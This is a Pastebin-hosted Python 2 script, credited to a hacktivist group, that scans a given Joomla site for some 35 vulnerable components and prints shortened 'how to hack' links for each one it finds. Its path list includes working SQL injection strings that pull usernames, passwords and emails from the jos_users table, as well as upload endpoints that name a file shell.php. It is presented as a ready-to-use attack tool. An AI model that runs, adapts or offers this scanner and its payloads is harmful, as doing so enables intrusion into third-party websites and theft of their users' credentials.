Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- #Joomla Exploit Scanner Version 1.0 Beta
- #Coded by CrimeCrew
- #http://hacktivizmgunceleri.blogspot.com.tr/
- #https://www.facebook.com/yasir.coskun.Real
- #https://www.facebook.com/groups/421380114709514/
- #CrimeCrew
- import sys
- import urllib2
- import re
- import time
- import httplib
- import random
- #Bad HTTP Responses
- BAD_RESP = [400,401,404]
- def main(path):
- print "[#] Test Ediliyor:",host.split("/",1)[1]+path
- try:
- h = httplib.HTTP(host.split("/",1)[0])
- h.putrequest("HEAD", "/"+host.split("/",1)[1]+path)
- h.putheader("Host", host.split("/",1)[0])
- h.endheaders()
- resp, reason, headers = h.getreply()
- return resp, reason, headers.get("Server")
- except(), msg:
- print "Error Occurred:",msg
- pass
- def timer():
- now = time.localtime(time.time())
- return time.asctime(now)
- def slowprint(s):
- for c in s + '\n':
- sys.stdout.write(c)
- sys.stdout.flush() # defeat buffering
- time.sleep(8./90)
- print "\n Joomla! Exploit Scanner[Version 1.0 Beta]"
- print " Coder By CrimeCrew"
- print " www.HacktivizmGunceleri.Blogspot.Com.Tr"
- xpls = { "images/artforms/attachedfiles/" : ["com_artforms","http://goo.gl/MiQMIu"],"index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1" : ["com_fabrik","http://goo.gl/mZ3Qsl"] , "index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--" : ["com_idoblog","http://goo.gl/gAFm9F"], "index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--" : ["com_ignitegallery","http://goo.gl/pgbM6r"], "administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=shell.php" : ["com_maian15","http://goo.gl/NQWtR6"], "administrator/components/com_maianmedia/charts/php-ofc-library/ofc_upload_image.php?name=shell.php" : ["com_maianmedia","http://goo.gl/vlxGt0"] , "index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=" : ["com_media","http://goo.gl/y2rLm7"], "administrator/components/com_redmystic/chart/tmp-upload-images/" : ["com_redmystic","http://goo.gl/REjCvg"], "index.php?option=com_users&view=registration" : ["com_user","http://goo.gl/Bp0IjM"], "index.php?option=com_jce" : ["JCE","http://goo.gl/hVp8Hu"] , "index.php?option=com_user&view=reset&layout=confirm" : ["com_user 2","http://goo.gl/zoTbrf"] , "index.php?option=com_shohada&view=shohada" : ["com_shohada","http://goo.gl/90eMKC"], "index.php?option=com_smartformer" : ["com_smartformer","http://goo.gl/x4m3vA"], "index.php?option=com_garyscookbook&func=newItem" : ["com_garyscookbook","http://goo.gl/e6GAeu"],"index.php/component/osproperty/?task=agent_register" : ["com_osproperty","http://goo.gl/dlKu19"], "index.php?option=com_acymailing>ask=archive&listid=" : ["com_acymailing [SQLi]","http://goo.gl/2rTCxA"], "index.php?option=com_extplorer&action=show_error&dir=" : ["com_extplorer","http://goo.gl/8He9vM"] , "index.php?option=com_xmap&tmpl=component&Itemid=999&view=" : ["com_xmap" , "http://goo.gl/gTOxZE"] , "index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*" : ["com_content [SQLi]" , "http://goo.gl/nmzTmE"] , "/index.php?option=com_flippingbook&Itemid=28&book_id=nullunionselectnull,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,nullfromjos_users/*" : ["com_flippingbook [SQLi]" , "http://goo.gl/fAZvqC"] , "index.php?option=com_phocagallery&view=categories&Itemid=" : ["com_phocagallery" , "http://goo.gl/j2N3Qo"] , "index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--" : ["com_lyftenbloggie [SQLi]" , "http://goo.gl/0EENFD"] , "index.php?option=com_wrapper&view=wrapper&Itemid=":["com_wrapper","http://goo.gl/l1ldl1"] , "index.php?option=com_fireboard&Itemid=":["com_fireboard","http://goo.gl/6jfAzQ"], "j/index.php?option=com_mailto&tmpl=component&template=beez_20&link=":["com_mailto [SPAM]","http://goo.gl/KS9uZO"], "/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc" : ["com_simpleimageupload","http://goo.gl/VcjDSC"], "/administrator/components/com_simplephotogallery/lib/uploadFile.php" : ["com_simplephotogallery","http://goo.gl/LYt0HU"], "/components/com_creativecontactform/fileupload/index.php" : ["com_creativecontactform","http://goo.gl/zqkRPs"],"/index.php?option=com_jfuploader&Itemid=|/index.php?option=com_jfuploader&Itemid=" : ["com_jfuploader","http://goo.gl/IMk9r2"],"/components/com_pinboard/|/components/com_pinboard/popup/popup.php?option=showupload" : ["com_pinboard","http://goo.gl/gBa5X1"],"/components/com_agora/" : ["com_agora","http://goo.gl/e2hLrd"],"/administrator/components/com_joomla_flash_uploader/" : ["com_joomla_flash_uploader","http://goo.gl/El7Guu"],"/components/com_simpleboard/" : ["SimpleBoard","http://goo.gl/3WzjMP"],"/components/com_joomlaboard/" : ["JoomlaBoard","http://goo.gl/HoXXfR"],"/components/com_expose/uploadimg.php" : ["com_expose","http://goo.gl/O80vlp"],}
- if len(sys.argv) != 2:
- print "\n Usage: joomla.py <site>"
- print " Example: joomla.py www.site.com/\n"
- sys.exit(1)
- host = sys.argv[1].replace("http://","").rsplit("/",1)[0]
- if host[-1] != "/":
- host = host+"/"
- print "\n[#] Hedef:",host
- print "[#] Exploit Sayisi:",len(xpls)
- print "[#] Exploit Taraniyor"
- for xpl,(poc,expl) in xpls.items():
- resp,reason,server = main(xpl)
- if resp not in BAD_RESP:
- print ""
- print "[#] Sonuc:",resp, reason
- print "[#] Exploit:",poc
- print "[#] Nasil Hacklenir:",expl
- print "################################################################################"
- else:
- print ""
- print "[-] Sonuc:",resp, reason
- print "================================================================================"
- print "[-] Done"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement